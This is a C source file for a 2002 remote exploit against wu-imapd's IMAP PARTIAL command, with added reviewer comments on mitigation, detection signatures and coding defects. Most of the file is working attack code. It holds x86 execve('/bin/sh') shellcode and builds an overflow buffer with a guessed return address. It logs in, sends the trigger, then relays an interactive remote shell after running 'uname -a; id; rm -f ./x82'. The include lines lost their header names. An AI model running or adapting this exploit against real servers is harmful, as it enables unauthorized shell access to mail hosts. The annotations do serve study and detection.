/*
** ** Wu-IMAPd Partial Mailbox Attribute Remote Buffer Overflow Exploit
** by Xpl017Elz
** __
** Vulnerable -
**
** Washington University wu-imapd 2000.0 c
** + Conectiva Linux 6.0
** + Conectiva Linux 7.0
** + Conectiva Linux 8.0
** + EnGarde Secure Linux 1.0.1
** Washington University wu-imapd 2000.0 b
** + MandrakeSoft Corporate Server 1.0.1
** + MandrakeSoft Linux Mandrake 7.1
** + MandrakeSoft Linux Mandrake 7.2
** + MandrakeSoft Linux Mandrake 8.0
** + MandrakeSoft Linux Mandrake 8.0 ppc
** + MandrakeSoft Linux Mandrake 8.1
** + MandrakeSoft Linux Mandrake 8.1 ia64
** + MandrakeSoft Linux Mandrake 8.2
** Washington University wu-imapd 2000.0 a
** Washington University wu-imapd 2000.0
** + Caldera OpenLinux Server 3.1
** + Caldera OpenLinux Server 3.1.1
** + Caldera OpenLinux Workstation 3.1
** + Caldera OpenLinux Workstation 3.1.1
** Washington University wu-imapd 2001.0 a
** + HP Secure OS software for Linux 1.0
** + RedHat Linux 6.2 alpha
** + RedHat Linux 6.2 i386
** + RedHat Linux 6.2 sparc
** + RedHat Linux 7.0 alpha
** + RedHat Linux 7.0 i386
** + RedHat Linux 7.1 alpha
** + RedHat Linux 7.1 i386
** + RedHat Linux 7.1 ia64
** + RedHat Linux 7.2 i386
** + RedHat Linux 7.2 ia64
** + Trustix Secure Linux 1.1
** + Trustix Secure Linux 1.2
** + Trustix Secure Linux 1.5
** Washington University wu-imapd 2001.0
** __
** f. 06/10/2002 s. write messages.
** __
** exploit by "you dong-hun"(Xpl017Elz), .
** My World: http://x82.i21c.net
**
** Special Greets: INetCop Security, Marcell Fodor(g00d Advisory).
** */

/*
 * Reviewer summary (defensive reading of this historical, 2002-era code):
 *
 * What it does: after a normal authenticated IMAP session (login, create,
 * select, append), main() sends one PARTIAL command whose body-section
 * argument is roughly 1 KB long (0x41 filler, then the shellcode, then a
 * guessed stack address repeated eight times).  The affected wu-imapd
 * releases listed above copied that argument into a fixed-size stack
 * buffer; the overflow redirects control into the payload and shell()
 * then relays stdin/stdout to the resulting /bin/sh.
 *
 * Precondition: valid IMAP credentials (-u/-p).  This is a post-auth
 * overflow, so the impact is a mail user gaining the privileges of the
 * imapd process, not an unauthenticated remote compromise.
 *
 * Mitigation: run a vendor-patched wu-imapd (the affected versions are
 * listed in the header); the build-time fix is bounding the copy of the
 * section argument.  Detection: an IMAP PARTIAL (or BODY[...]) request
 * whose section specifier is hundreds of bytes long, consists mostly of
 * repeated 'A' (0x41) bytes, and contains non-printable bytes, is not
 * produced by any mail client.  A subsequent "uname -a; id" string on an
 * IMAP connection (see shell()) is the post-exploitation signature.
 *
 * NOTE(review): the eight #include lines below lost their header names
 * in extraction (the angle-bracketed names were stripped).  From the
 * functions used they were presumably <stdio.h>, <stdlib.h>, <string.h>,
 * <unistd.h>, <netdb.h>, <sys/types.h>, <sys/socket.h> and
 * <netinet/in.h> -- confirm against the original file.
 */
#include
#include
#include
#include
#include
#include
#include
#include

#define Xpl017Elz x82 (lol~)   /* joke macro; never expanded */
#define USER "x82"             /* default -u */
#define PASS "Xpl017Elz"       /* default -p */
#define HOST "localhost"       /* default -h */

/*
 * Linux/x86 execve("/bin/sh") payload followed by exit(0).
 * The trailing "/bin/sh" is stored with five of its bytes reduced by 0x50
 * so the string contains no NUL; the first instructions (addb $0x50,...)
 * restore it in place before the int $0x80 (eax=0xb, execve).
 */
char shellcode[] = /* C00l Ohhara c0de */
    "\xeb\x38"                 /* jmp 0x38 */
    "\x5e"                     /* popl %esi */
    "\x80\x46\x01\x50"         /* addb $0x50,0x1(%esi) */
    "\x80\x46\x02\x50"         /* addb $0x50,0x2(%esi) */
    "\x80\x46\x03\x50"         /* addb $0x50,0x3(%esi) */
    "\x80\x46\x05\x50"         /* addb $0x50,0x5(%esi) */
    "\x80\x46\x06\x50"         /* addb $0x50,0x6(%esi) */
    "\x89\xf0"                 /* movl %esi,%eax */
    "\x83\xc0\x08"             /* addl $0x8,%eax */
    "\x89\x46\x08"             /* movl %eax,0x8(%esi) */
    "\x31\xc0"                 /* xorl %eax,%eax */
    "\x88\x46\x07"             /* movb %eax,0x7(%esi) */
    "\x89\x46\x0c"             /* movl %eax,0xc(%esi) */
    "\xb0\x0b"                 /* movb $0xb,%al */
    "\x89\xf3"                 /* movl %esi,%ebx */
    "\x8d\x4e\x08"             /* leal 0x8(%esi),%ecx */
    "\x8d\x56\x0c"             /* leal 0xc(%esi),%edx */
    "\xcd\x80"                 /* int $0x80 */
    "\x31\xdb"                 /* xorl %ebx,%ebx */
    "\x89\xd8"                 /* movl %ebx,%eax */
    "\x40"                     /* inc %eax */
    "\xcd\x80"                 /* int $0x80 */
    "\xe8\xc3\xff\xff\xff"     /* call -0x3d */
    "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */

int setsock(char *hostname, int port);
int usage(char *argx);
void shell(int socks);

/*
 * Resolve hostname and open a TCP connection to hostname:port.
 * Returns the connected socket descriptor.  On any failure (lookup,
 * socket, connect) prints the error and exit(1)s -- it never returns -1.
 */
int setsock(char *hostname, int port)
{
    int sock;
    struct hostent *he;
    struct sockaddr_in x82_addr;

    if((he = gethostbyname(hostname)) == NULL) {
        herror("gethostbyname");
        exit(1);
    }
    if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }
    x82_addr.sin_family = AF_INET;
    x82_addr.sin_port = htons(port);
    /* only the first resolved address is used */
    x82_addr.sin_addr = *((struct in_addr *)he->h_addr);
    bzero(&x82_addr.sin_zero, 8);
    if(connect(sock, (struct sockaddr *)&x82_addr, sizeof(struct sockaddr)) == -1) {
        perror("connect");
        exit(1);
    }
    return(sock);
}

/*
 * Print the command-line help for program name argx and exit(0).
 * Declared int but never returns, so the return type is cosmetic.
 */
int usage(char *argx)
{
    printf("\n\tUsage: %s -options arguments\n\n", argx);
    printf("\t-h [hostname] - target host\n");
    printf("\t-u [userid] - imap user id\n");
    printf("\t-p [password] - user password\n");
    printf("\t-s [addr] - &shellcode addr\n");
    printf("\t-d - Debugging mode\n\n");
    printf(" Example: %s -h localhost -u x82 -p x82\n\n", argx);
    exit(0);
}

/*
 * Interactive relay between the local terminal and the socket socks.
 * Sends one fixed command first ("uname -a; id; rm -f ./x82"), then
 * select()s on socks and stdin, copying bytes each way until the peer
 * closes, at which point it exit(0)s.  Never returns normally.
 *
 * NOTE(review): read() may return exactly 1024, and fall_again[died] = 0
 * then writes one byte past the 1024-byte buffer (needs a 1025-byte
 * buffer or a read of sizeof fall_again - 1).  The select() and write()
 * return values are not checked.
 */
void shell(int socks)
{
    int died;
    char fall_again[1024]; /* Murder Mus1c */
    char *command = "uname -a; id; rm -f ./x82\n";
    fd_set rset;

    bzero(&fall_again, 1024);
    printf("\n");
    send(socks, command, strlen(command), 0);
    while(1) {
        FD_ZERO(&rset);
        FD_SET(socks, &rset);
        FD_SET(STDIN_FILENO, &rset);
        select(socks+1, &rset, NULL, NULL, NULL);
        if(FD_ISSET(socks, &rset)) {
            died = read(socks, fall_again, 1024);
            if(died <= 0) {
                /* peer closed or error: end of session */
                printf("\n [*] Thanks, P00rcode by Xpl017Elz.\n\n");
                exit(0);
            }
            fall_again[died] = 0;   /* NOTE(review): off-by-one when died == 1024 */
            printf("%s", fall_again);
        }
        if(FD_ISSET(STDIN_FILENO, &rset)) {
            died = read(STDIN_FILENO, fall_again, 1024);
            if(died > 0) {
                fall_again[died] = 0;   /* NOTE(review): same off-by-one */
                write(socks, fall_again, died);
            }
        }
    }
    return;
}

/*
 * Entry point.  Options: -h host, -u user, -p password, -s address
 * (parsed with strtoul base 0, so 0x... works), -d debug (verbose,
 * 1 s pause between steps via sle2p()).  Port is fixed at 143.
 *
 * atbuf layout built below (1064 bytes, used as a C string):
 *   [0 .. 1024 - strlen(shellcode))   0x41 filler
 *   [.. 1024)                         shellcode
 *   [1024 .. 1056)                    shelladdr, little-endian, x8
 *   [1056]                            NUL from the initial bzero
 *
 * NOTE(review), C-level defects visible here (left as-is, this is a
 * documentation pass):
 *  - strncpy(host/user/pass, optarg, 0x82) does not NUL-terminate when
 *    optarg is 0x82 bytes or longer.
 *  - "%d" is used for size_t (strlen results) and "%p" for an unsigned
 *    long (shelladdr): both are undefined format/argument mismatches.
 *  - recv() results are unchecked; readbuf is zeroed beforehand, but a
 *    full 1024-byte recv() leaves it unterminated before strstr()/printf().
 *  - sle2p() and stor2() are called before any declaration and defined
 *    with an implicit int return type (not valid C99).
 *  - In -d mode the constructed buffer is passed through system() via
 *    a printf|hexdump pipeline, i.e. payload bytes reach a shell.
 *  - main() falls off its end without a return (shell() never returns,
 *    so this is unreachable in practice).
 */
int main(int argc, char *argv[])
{
    char user[0x82] = USER, pass[0x82] = PASS, host[0x82] = HOST,
         readbuf[1024], atbuf[1064], sendbuf[2024];
#define CODE 0xbffff882               /* default guessed stack address (-s overrides) */
    unsigned long shelladdr = CODE;
    int sock, ax82, bx82, cx82, dx82, debug = 0, port = 143;

    bzero(&readbuf, 1024);
    bzero(&sendbuf, 2024);
    bzero(&atbuf, 1064);
    printf("\n *** WOOoou-IMAPd4 v2000.0~ v2001.0 Remote Exploit ***\n");
    printf("\t\t\t\t\t by Xpl017Elz\n\n");

    /* option parsing; getopt returns -1 (== EOF) when done */
    while((ax82 = getopt(argc, argv, "h:u:p:s:d")) != EOF) {
        switch(ax82) {
            case 'h':
                strncpy(host, optarg, 0x82);
                break;
            case 'u':
                strncpy(user, optarg, 0x82);
                break;
            case 'p':
                strncpy(pass, optarg, 0x82);
                break;
            case 's':
                shelladdr = strtoul(optarg, NULL, 0);
                break;
            case 'd':
                debug = 1;
                printf("\n*** OK, Debugging mode ***\n\n");
                break;
            case '?':
                usage(argv[0]);
                break;
        }
    }

    /* filler: 'A' bytes up to 1024 minus the payload length */
    for(bx82 = 0; bx82 < 1024 - strlen(shellcode); bx82++) {
        atbuf[bx82] = 0x41;
    }
    if(debug) {
        printf("\n*** NOP size: %d ***", 1024 - strlen(shellcode));
        printf("\n*** Shellcode size: %d ***\n\n", strlen(shellcode));
    }
    /* payload immediately after the filler; bx82 now == 1024 */
    for(cx82 = 0; cx82 < strlen(shellcode); cx82++) {
        atbuf[bx82++] = shellcode[cx82];
    }
    if(debug) {
        printf("___(Shellcode here)___\n");
        /* NOTE(review): buffer contents interpolated into a system() command */
        snprintf(sendbuf, 2024, "printf \"%s\" | hexdump", atbuf);
        system(sendbuf);
        printf("___(Shellcode end)___\n\n");
        memset(sendbuf, 0, 1024);   /* only the first 1024 of 2024 bytes are cleared here */
        printf("[*] Using Address: %p\n\n", shelladdr);
        printf("[Enter]");
        getchar();
    }
    /* eight copies of the guessed address, 32 bytes total */
    for(dx82 = 0; dx82 < 0x20; dx82 += 4) { /* Little Endian format */
        atbuf[bx82++] = (shelladdr&0x000000ff)>> 0;
        atbuf[bx82++] = (shelladdr&0x0000ff00)>> 8;
        atbuf[bx82++] = (shelladdr&0x00ff0000)>>16;
        atbuf[bx82++] = (shelladdr&0xff000000)>>24;
    }

    sock = setsock(host, port); /* use sock */
    recv(sock, readbuf, 1024, 0); /* Read Banner */
    /* crude version check: the greeting must mention IMAP4 */
    if(strstr(readbuf, "IMAP4") == NULL) {
        if(debug) {
            printf("\n [x] Banner: %s\n", readbuf);
        }
        printf(" [-] IMAP version Check.\n\n");
        close(sock);
        exit(0);
    }
    if(debug) {
        printf("\n [1] Banner: %s\n", readbuf);
    }
    memset(readbuf, 0, 1024);
    sle2p(debug); /* 1 liked TRUST(C) */

    /* Step 1: authenticate.  The reply is never checked, so
     * "Login Success" is printed regardless of the server's answer. */
    snprintf(sendbuf, 2024, "x0x login %s %s\n", user, pass);
    send(sock, sendbuf, strlen(sendbuf), 0); /* Login */
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0);
    if(debug) {
        printf(" [2] Login: %s\n", readbuf);
    }
    printf(" [*] Login Success\n\n");
    memset(readbuf, 0, 1024);
    sle2p(debug); /* Downfall listen t0? */

    /* Step 2: create a mailbox named x82 (reply ignored) */
    snprintf(sendbuf, 2024, "x82 create x82\n");
    send(sock, sendbuf, strlen(sendbuf), 0); /* Create BOX */
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0);
    if(debug) {
        printf(" [3] Create: %s\n", readbuf);
    }
    memset(readbuf, 0, 1024);
    sle2p(debug); /* 1 liked Murder Mus1c */

    /* Step 3: select it */
    snprintf(sendbuf, 2024, "x82 select x82\n");
    send(sock, sendbuf, strlen(sendbuf), 0); /* Select BOX */
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0);
    if(debug) {
        printf(" [4] Select: %s\n", readbuf);
    }
    memset(readbuf, 0, 1024);
    sle2p(debug); /* Fall Again listen t0? */

    /* Step 4: append a 4-byte message so that message 1 exists
     * (literal {4} followed by the body on the next line) */
    snprintf(sendbuf, 2024, "x82 append x82 (\\Seen) {4}\nx82!\n");
    send(sock, sendbuf, strlen(sendbuf), 0); /* Append BOX */
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0);
    if(debug) {
        printf(" [5] Append: %s\n", readbuf);
    }
    memset(readbuf, 0, 1024);
    sle2p(debug); /* Kick Bug ! :-p */

    /* Step 5: the trigger.  The whole ~1056-byte atbuf becomes the
     * section specifier of a PARTIAL command on message 1.  This single
     * request is the on-the-wire indicator for this vulnerability. */
    snprintf(sendbuf, 2024, "x82 partial 1 body[%s] 1 1\n", atbuf);
    send(sock, sendbuf, strlen(sendbuf), 0); /* Partial Command */
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0);
    if(debug) {
        printf(" [6] Partial: %s\n", readbuf);
    }
    memset(readbuf, 0, 1024);
    sle2p(debug); /* Waiting, Get UserShell ... */

    /* Step 6: logout.  If the overflow succeeded the peer is no longer
     * speaking IMAP, so this and its recv() are effectively no-ops. */
    snprintf(sendbuf, 2024, "x0x logout\n"); /* Logout */
    send(sock, sendbuf, strlen(sendbuf), 0);
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0);
    if(debug) {
        printf(" [7] Logout: %s\n", readbuf);
    }
    printf(" [*] Logout\n\n");
    memset(readbuf, 0, 1024);
    sle2p(debug); /* Ending Sploit */

    if(debug) {
        printf("\n\n *** It's UserShell. :-) ***\n\n");
    } /* hehe */
    stor2(); /* my messages */
    shell(sock);   /* does not return */
}

/*
 * Pause one second between protocol steps, but only in -d mode.
 * NOTE(review): implicit int return type and no prior declaration.
 */
sle2p(int debug)
{
    if(debug) {
        sleep(1); // Debugging mode
    }
}

/*
 * Print the author's greeting banner.  Output only, no other effect.
 * NOTE(review): implicit int return type and no prior declaration.
 */
stor2()
{
    printf("\n*** Xpl017Elz has joined #WoWHacker\n");
    printf(" vangelis// hi\n");
    printf(" I saved good music some. It gathered by album.\n");
    printf(" Raised here: http://x82.i21c.net/\n");
    printf(" [Mus1c] <- here.\n");
    printf("*** Xpl017Elz is now known as x82\n");
    printf(" Thank you for worrying always me.\n");
    printf("*** x82 has quit IRC (Understand thing which do not English.)\n\n");
}